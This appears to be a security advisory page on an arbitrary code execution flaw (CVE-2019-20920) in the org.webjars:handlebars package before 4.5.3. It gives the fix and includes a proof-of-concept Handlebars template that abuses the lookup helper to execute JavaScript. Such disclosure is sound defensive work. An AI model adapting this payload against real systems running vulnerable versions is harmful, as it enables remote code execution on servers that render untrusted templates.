Arbitrary Code Execution Affecting org.webjars:handlebars package, versions [,4.5.3)


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.7% (81st percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Arbitrary Code Execution vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JAVA-ORGWEBJARS-541444
  • published15 Nov 2019
  • disclosed14 Nov 2019
  • creditFrancois Lajeunesse-Robert

Introduced: 14 Nov 2019

CVE-2019-20920  (opens in a new tab)
CWE-94  (opens in a new tab)

How to fix?

Upgrade org.webjars:handlebars to version 4.5.3 or higher.

Overview

org.webjars:handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Arbitrary Code Execution. The package's lookup helper doesn't validate templates correctly, allowing attackers to submit templates that execute arbitrary JavaScript in the system.

PoC

    {{#with split as |a|}}
        {{pop (push "alert('Vulnerable Handlebars JS');")}}
        {{#with (concat (lookup join (slice 0 1)))}}
            {{#each (slice 2 3)}}
                {{#with (apply 0 a)}}
                    {{.}}
                {{/with}}
            {{/each}}
        {{/with}}
    {{/with}}
{{/with}}

CVSS Scores

version 3.1